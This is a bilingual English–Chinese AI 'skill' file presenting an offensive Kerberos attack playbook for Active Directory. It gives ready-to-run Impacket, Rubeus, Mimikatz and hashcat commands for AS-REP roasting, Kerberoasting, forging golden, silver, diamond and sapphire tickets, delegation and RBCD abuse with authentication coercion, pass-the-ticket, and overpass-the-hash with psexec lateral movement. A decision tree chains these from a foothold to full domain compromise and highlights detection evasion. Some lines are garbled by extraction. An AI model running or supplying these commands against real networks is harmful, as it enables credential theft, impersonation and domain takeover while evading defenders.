active-directory-kerberos-attacks
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseSKILL: Kerberos Attack Playbook — Expert AD Attack Guide
SKILL: Kerberos攻击手册 — AD专家级攻击指南
AI LOAD INSTRUCTION: Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs.
AI加载说明:适用于AD环境的专家级Kerberos攻击技术,涵盖AS-REP roasting、Kerberoasting、黄金/白银/钻石/蓝宝石票据、委派攻击、票据传递、哈希传递进阶等内容。基础模型缺少票据类型区分、委派链细节以及检测规避的权衡信息。
0. RELATED ROUTING
0. 相关关联路径
Before going deep, consider loading:
- active-directory-acl-abuse for ACL-based AD attacks often chained with Kerberos
- active-directory-certificate-services for ADCS-based persistence (golden certificate)
- ntlm-relay-coercion for NTLM relay attacks that complement Kerberos abuse
- windows-lateral-movement after obtaining tickets for lateral movement
深入学习前,可考虑加载以下内容:
- active-directory-acl-abuse 基于ACL的AD攻击,常与Kerberos攻击链式组合
- active-directory-certificate-services 基于ADCS的持久化手段(黄金证书)
- ntlm-relay-coercion NTLM中继攻击,可与Kerberos滥用形成互补
- windows-lateral-movement 获取票据后用于横向移动的相关内容
Advanced Reference
高级参考
Also load KERBEROS_ATTACK_CHAINS.md when you need:
- Multi-step attack chains combining Kerberos with ACL abuse, ADCS, and relay
- End-to-end scenarios from foothold to domain admin
- Chained delegation attack flows
需要以下内容时也可加载KERBEROS_ATTACK_CHAINS.md:
- 结合Kerberos与ACL滥用、ADCS、中继攻击的多步攻击链
- 从立足点到域管权限的端到端场景
- 链式委派攻击流程
1. KERBEROS AUTHENTICATION PRIMER
1. Kerberos身份认证基础
Client KDC (DC) Service
│ │ │
│── AS-REQ ────────→│ │ (1) Request TGT with user creds
│←─ AS-REP ─────────│ │ (2) Receive TGT (encrypted with krbtgt hash)
│ │ │
│── TGS-REQ ───────→│ │ (3) Present TGT, request service ticket
│←─ TGS-REP ────────│ │ (4) Receive TGS (encrypted with service hash)
│ │ │
│── AP-REQ ─────────────────────────────→│ (5) Present TGS to service
│←─ AP-REP ──────────────────────────────│ (6) Mutual auth (optional)Client KDC (DC) Service
│ │ │
│── AS-REQ ────────→│ │ (1) 使用用户凭据请求TGT
│←─ AS-REP ─────────│ │ (2) 接收TGT(使用krbtgt哈希加密)
│ │ │
│── TGS-REQ ───────→│ │ (3) 出示TGT,请求服务票据
│←─ TGS-REP ────────│ │ (4) 接收TGS(使用服务哈希加密)
│ │ │
│── AP-REQ ─────────────────────────────→│ (5) 向服务出示TGS
│←─ AP-REP ──────────────────────────────│ (6) 双向认证(可选)2. AS-REP ROASTING
2. AS-REP Roasting攻击
Users with "Do not require Kerberos preauthentication" can be queried for AS-REP without knowing their password.
开启了“不需要Kerberos预认证”的用户,无需知晓其密码即可查询获取AS-REP响应。
Enumerate Vulnerable Users
枚举存在漏洞的用户
bash
undefinedbash
undefinedImpacket — from Linux
Impacket — Linux环境执行
GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC_IP -format hashcat -outputfile asrep.txt
GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC_IP -format hashcat -outputfile asrep.txt
Impacket — with domain creds (enumerate automatically)
Impacket — 携带域凭据(自动枚举)
GetNPUsers.py DOMAIN/user:password -dc-ip DC_IP -request
GetNPUsers.py DOMAIN/user:password -dc-ip DC_IP -request
Rubeus — from Windows (domain-joined)
Rubeus — Windows域内主机执行
Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
PowerView — enumerate users
PowerView — 枚举用户
Get-DomainUser -PreauthNotRequired | Select-Object samaccountname
undefinedGet-DomainUser -PreauthNotRequired | Select-Object samaccountname
undefinedCrack AS-REP Hash
破解AS-REP哈希
bash
undefinedbash
undefinedHashcat mode 18200
Hashcat 模式 18200
hashcat -m 18200 asrep.txt rockyou.txt --rules-file best64.rule
hashcat -m 18200 asrep.txt rockyou.txt --rules-file best64.rule
John
John
john asrep.txt --wordlist=rockyou.txt
---john asrep.txt --wordlist=rockyou.txt
---3. KERBEROASTING
3. Kerberoasting攻击
Any domain user can request TGS for accounts with SPNs. The TGS is encrypted with the service account's NTLM hash.
任意域用户都可以为配置了SPN的账号请求TGS,TGS使用服务账号的NTLM哈希加密。
Request Service Tickets
请求服务票据
bash
undefinedbash
undefinedImpacket
Impacket
GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP -request -outputfile tgs.txt
GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP -request -outputfile tgs.txt
Rubeus (from Windows)
Rubeus (Windows环境执行)
Rubeus.exe kerberoast /outfile:tgs.txt
Rubeus.exe kerberoast /outfile:tgs.txt
Rubeus — target specific SPN / high-value accounts
Rubeus — 针对特定SPN/高价值账号
Rubeus.exe kerberoast /user:svc_sql /outfile:tgs_sql.txt
Rubeus.exe kerberoast /user:svc_sql /outfile:tgs_sql.txt
PowerView + manual request
PowerView + 手动请求
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/db.domain.com"
undefinedGet-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/db.domain.com"
undefinedCrack TGS Hash
破解TGS哈希
bash
undefinedbash
undefinedHashcat mode 13100 (RC4) or 19700 (AES)
Hashcat 模式 13100 (RC4) 或 19700 (AES)
hashcat -m 13100 tgs.txt rockyou.txt --rules-file best64.rule
hashcat -m 13100 tgs.txt rockyou.txt --rules-file best64.rule
RC4 tickets crack much faster than AES256 — target RC4 if possible
RC4票据的破解速度远快于AES256 — 尽可能优先针对RC4票据
Rubeus: /tgtdeleg forces RC4 on some configs
Rubeus: /tgtdeleg 参数可在部分配置下强制使用RC4加密
Rubeus.exe kerberoast /tgtdeleg
---Rubeus.exe kerberoast /tgtdeleg
---4. TICKET FORGING — GOLDEN, SILVER, DIAMOND, SAPPHIRE
4. 票据伪造 — 黄金、白银、钻石、蓝宝石票据
Golden Ticket
黄金票据
Forge TGT using the hash → impersonate any user, including non-existent ones.
krbtgtbash
undefined使用哈希伪造TGT → 可冒充任意用户,包括不存在的用户。
krbtgtbash
undefinedImpacket — forge golden ticket
Impacket — 伪造黄金票据
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain DOMAIN.COM administrator
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain DOMAIN.COM administrator
Mimikatz
Mimikatz
kerberos::golden /user:administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /krbtgt:KRBTGT_HASH /ptt
kerberos::golden /user:administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /krbtgt:KRBTGT_HASH /ptt
Rubeus
Rubeus
Rubeus.exe golden /rc4:KRBTGT_HASH /user:administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /ptt
**Prerequisites**: krbtgt NTLM hash (from DCSync or NTDS.dit)
**Persistence**: Valid until krbtgt password is changed **twice**Rubeus.exe golden /rc4:KRBTGT_HASH /user:administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /ptt
**前置条件**:krbtgt NTLM哈希(可通过DCSync或NTDS.dit获取)
**持久化有效期**:直到krbtgt密码被**两次**修改后失效Silver Ticket
白银票据
Forge TGS using the service account's hash → access specific service only, no KDC interaction.
bash
undefined使用服务账号哈希伪造TGS → 仅能访问特定服务,无需与KDC交互。
bash
undefinedImpacket — forge silver ticket for CIFS (file share)
Impacket — 为CIFS(文件共享)伪造白银票据
ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain DOMAIN.COM -spn cifs/target.domain.com administrator
ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain DOMAIN.COM -spn cifs/target.domain.com administrator
Mimikatz
Mimikatz
kerberos::golden /user:administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /target:target.domain.com /service:cifs /rc4:SERVICE_HASH /ptt
| Target Service | SPN Format | Use Case |
|---|---|---|
| File shares | `cifs/host` | Access SMB shares |
| WinRM | `http/host` | Remote PowerShell |
| LDAP | `ldap/dc` | DCSync-like queries |
| MSSQL | `MSSQLSvc/host:1433` | Database access |
| Exchange | `http/mail.domain.com` | Mailbox access |kerberos::golden /user:administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /target:target.domain.com /service:cifs /rc4:SERVICE_HASH /ptt
| 目标服务 | SPN格式 | 适用场景 |
|---|---|---|
| 文件共享 | `cifs/host` | 访问SMB共享 |
| WinRM | `http/host` | 远程PowerShell |
| LDAP | `ldap/dc` | 类DCSync查询 |
| MSSQL | `MSSQLSvc/host:1433` | 数据库访问 |
| Exchange | `http/mail.domain.com` | 邮箱访问 |Diamond Ticket
钻石票据
Modify a legitimately issued TGT → harder to detect than golden ticket.
bash
undefined修改合法签发的TGT → 比黄金票据更难检测。
bash
undefinedRubeus — request real TGT then modify PAC
Rubeus — 请求真实TGT后修改PAC
Rubeus.exe diamond /krbkey:KRBTGT_AES256 /user:administrator /domain:DOMAIN.COM /dc:DC01.DOMAIN.COM /ticketuser:targetadmin /ticketuserid:500 /groups:512 /ptt
**Advantage**: The ticket's metadata (timestamps, enc type) matches a real TGT issuance.Rubeus.exe diamond /krbkey:KRBTGT_AES256 /user:administrator /domain:DOMAIN.COM /dc:DC01.DOMAIN.COM /ticketuser:targetadmin /ticketuserid:500 /groups:512 /ptt
**优势**:票据的元数据(时间戳、加密类型)与真实签发的TGT完全一致。Sapphire Ticket
蓝宝石票据
Uses S4U2Self to get a real PAC for the target user, then embeds it in a forged ticket.
bash
undefined使用S4U2Self获取目标用户的真实PAC,然后将其嵌入伪造票据中。
bash
undefinedRubeus
Rubeus
Rubeus.exe diamond /krbkey:KRBTGT_AES256 /ticketuser:administrator /ticketuserid:500 /groups:512 /tgtdeleg /ptt
**Advantage**: PAC is a genuine copy from KDC, making detection extremely difficult.
---Rubeus.exe diamond /krbkey:KRBTGT_AES256 /ticketuser:administrator /ticketuserid:500 /groups:512 /tgtdeleg /ptt
**优势**:PAC是来自KDC的真实副本,极难被检测到。
---5. DELEGATION ATTACKS
5. 委派攻击
Unconstrained Delegation
无约束委派
Hosts with unconstrained delegation store user TGTs in memory.
bash
undefined配置了无约束委派的主机将用户TGT存储在内存中。
bash
undefinedEnumerate (PowerView)
枚举(PowerView)
Get-DomainComputer -Unconstrained | Select-Object dnshostname
Get-DomainComputer -Unconstrained | Select-Object dnshostname
Coerce admin authentication → capture TGT (Rubeus monitor mode)
强制管理员认证 → 捕获TGT(Rubeus监控模式)
Rubeus.exe monitor /interval:5 /nowrap
Rubeus.exe monitor /interval:5 /nowrap
Trigger via PrinterBug / PetitPotam → DC authenticates → TGT captured
通过PrinterBug / PetitPotam触发 → DC发起认证 → 捕获TGT
SpoolSample.exe DC01.domain.com COMPROMISED_HOST.domain.com
undefinedSpoolSample.exe DC01.domain.com COMPROMISED_HOST.domain.com
undefinedConstrained Delegation (S4U2Proxy)
约束委派(S4U2Proxy)
bash
undefinedbash
undefinedEnumerate
枚举
Get-DomainComputer -TrustedToAuth | Select-Object dnshostname,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | Select-Object dnshostname,msds-allowedtodelegateto
S4U2Self + S4U2Proxy → get TGS for allowed service as any user
S4U2Self + S4U2Proxy → 以任意用户身份获取允许访问服务的TGS
getST.py -spn cifs/target.domain.com -impersonate administrator DOMAIN/svc_account:password -dc-ip DC_IP
getST.py -spn cifs/target.domain.com -impersonate administrator DOMAIN/svc_account:password -dc-ip DC_IP
Rubeus
Rubeus
Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target.domain.com /ptt
undefinedRubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target.domain.com /ptt
undefinedResource-Based Constrained Delegation (RBCD)
基于资源的约束委派(RBCD)
Requires write access to on the target.
msDS-AllowedToActOnBehalfOfOtherIdentitybash
undefined需要对目标的属性拥有写入权限。
msDS-AllowedToActOnBehalfOfOtherIdentitybash
undefined1. Create or control a computer account (MAQ > 0)
1. 创建或控制一个计算机账号(MAQ > 0)
addcomputer.py -computer-name 'FAKE$' -computer-pass 'P@ss123' -dc-ip DC_IP DOMAIN/user:password
addcomputer.py -computer-name 'FAKE$' -computer-pass 'P@ss123' -dc-ip DC_IP DOMAIN/user:password
2. Set RBCD on target
2. 在目标上配置RBCD权限
rbcd.py -delegate-from 'FAKE$' -delegate-to 'TARGET$' -dc-ip DC_IP -action write DOMAIN/user:password
rbcd.py -delegate-from 'FAKE$' -delegate-to 'TARGET$' -dc-ip DC_IP -action write DOMAIN/user:password
3. S4U2Self + S4U2Proxy from controlled account
3. 从受控账号发起S4U2Self + S4U2Proxy请求
getST.py -spn cifs/TARGET.DOMAIN.COM -impersonate administrator DOMAIN/'FAKE$':'P@ss123' -dc-ip DC_IP
getST.py -spn cifs/TARGET.DOMAIN.COM -impersonate administrator DOMAIN/'FAKE$':'P@ss123' -dc-ip DC_IP
4. Use the ticket
4. 使用获取的票据
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass DOMAIN/administrator@TARGET.DOMAIN.COM
---export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass DOMAIN/administrator@TARGET.DOMAIN.COM
---6. PASS-THE-TICKET & OVERPASS-THE-HASH
6. 票据传递 & 哈希传递进阶(Overpass-the-Hash)
Pass-the-Ticket
票据传递(Pass-the-Ticket)
bash
undefinedbash
undefinedImpacket — use .ccache ticket
Impacket — 使用.ccache格式票据
export KRB5CCNAME=/path/to/ticket.ccache
psexec.py -k -no-pass DOMAIN/administrator@target.domain.com
export KRB5CCNAME=/path/to/ticket.ccache
psexec.py -k -no-pass DOMAIN/administrator@target.domain.com
Mimikatz — inject .kirbi ticket into session
Mimikatz — 将.kirbi格式票据注入当前会话
kerberos::ptt ticket.kirbi
kerberos::ptt ticket.kirbi
Rubeus
Rubeus
Rubeus.exe ptt /ticket:base64_ticket_blob
undefinedRubeus.exe ptt /ticket:base64_ticket_blob
undefinedOverpass-the-Hash (Pass-the-Key)
哈希传递进阶(Pass-the-Key)
Use NTLM hash to request a Kerberos TGT → pure Kerberos authentication (avoids NTLM logging).
bash
undefined使用NTLM哈希请求Kerberos TGT → 纯Kerberos身份认证(避免NTLM日志记录)。
bash
undefinedImpacket
Impacket
getTGT.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP
export KRB5CCNAME=user.ccache
getTGT.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP
export KRB5CCNAME=user.ccache
Rubeus (from Windows)
Rubeus (Windows环境执行)
Rubeus.exe asktgt /user:administrator /rc4:NTLM_HASH /ptt
Rubeus.exe asktgt /user:administrator /rc4:NTLM_HASH /ptt
Mimikatz
Mimikatz
sekurlsa::pth /user:administrator /domain:DOMAIN.COM /ntlm:NTLM_HASH /run:cmd.exe
---sekurlsa::pth /user:administrator /domain:DOMAIN.COM /ntlm:NTLM_HASH /run:cmd.exe
---7. KERBEROS DOUBLE HOP PROBLEM
7. Kerberos双跳问题
When authenticating via Kerberos across two hops (A → B → C), B cannot forward A's credentials to C by default.
通过Kerberos跨两跳进行身份认证时(A → B → C),默认情况下B无法将A的凭据转发给C。
Solutions
解决方案
| Method | How | Risk |
|---|---|---|
| CredSSP | Sends actual credentials to B | Credential exposure |
| Unconstrained delegation on B | B stores A's TGT | Over-privileged |
| Constrained delegation | B allowed to delegate to C | Preferred — scoped |
| RBCD | C trusts B to delegate | Modern, flexible |
| Invoke-Command nested | | Exposes password in script |
| 方法 | 实现方式 | 风险 |
|---|---|---|
| CredSSP | 将真实凭据发送给B | 凭据泄露 |
| B配置无约束委派 | B存储A的TGT | 权限过高 |
| 约束委派 | 允许B委派给C | 优先选择 — 权限可控 |
| RBCD | C信任B的委派请求 | 现代方案,灵活度高 |
| 嵌套Invoke-Command | 嵌套会话中使用 | 密码会在脚本中暴露 |
8. KERBEROS ATTACK DECISION TREE
8. Kerberos攻击决策树
AD environment — targeting Kerberos
│
├── Have domain user creds?
│ ├── Kerberoast → crack service account hashes (§3)
│ ├── Enumerate users without preauth → AS-REP roast (§2)
│ ├── Enumerate delegation → unconstrained/constrained/RBCD (§5)
│ └── Enumerate SPNs for high-value accounts
│
├── Have service account hash?
│ ├── Silver ticket for that service (§4)
│ └── If constrained delegation → S4U2Proxy chain (§5)
│
├── Have krbtgt hash?
│ ├── Golden ticket → any user, any service (§4)
│ ├── Diamond ticket → stealthier forging (§4)
│ └── Sapphire ticket → hardest to detect (§4)
│
├── Compromised host with unconstrained delegation?
│ ├── Monitor for incoming TGTs (Rubeus monitor)
│ ├── Coerce DC authentication (PrinterBug/PetitPotam)
│ └── Capture DC TGT → DCSync
│
├── Can write to target's msDS-AllowedToActOnBehalfOfOtherIdentity?
│ └── RBCD attack (§5) → create machine account + delegate
│
├── Have NTLM hash but need Kerberos auth?
│ └── Overpass-the-Hash → request TGT (§6)
│
└── Have .kirbi / .ccache ticket?
└── Pass-the-Ticket → use directly (§6)AD环境 — 针对Kerberos进行攻击
│
├── 是否拥有域用户凭据?
│ ├── Kerberoast → 破解服务账号哈希(§3)
│ ├── 枚举无需预认证的用户 → AS-REP roast攻击(§2)
│ ├── 枚举委派配置 → 无约束/约束/RBCD攻击(§5)
│ └── 枚举高价值账号的SPN
│
├── 是否拥有服务账号哈希?
│ ├── 生成对应服务的白银票据(§4)
│ └── 如果配置了约束委派 → 发起S4U2Proxy链式攻击(§5)
│
├── 是否拥有krbtgt哈希?
│ ├── 黄金票据 → 可冒充任意用户访问任意服务(§4)
│ ├── 钻石票据 → 更隐蔽的伪造方式(§4)
│ └── 蓝宝石票据 → 最难检测(§4)
│
├── 是否拿下了配置无约束委派的主机?
│ ├── 监控传入的TGT(Rubeus monitor模式)
│ ├── 强制DC发起认证(PrinterBug/PetitPotam)
│ └── 捕获DC的TGT → 发起DCSync
│
├── 是否拥有目标msDS-AllowedToActOnBehalfOfOtherIdentity属性的写入权限?
│ └── RBCD攻击(§5) → 创建机器账号+配置委派
│
├── 拥有NTLM哈希但需要Kerberos认证?
│ └── 哈希传递进阶 → 请求TGT(§6)
│
└── 拥有.kirbi / .ccache格式的票据?
└── 票据传递 → 直接使用(§6)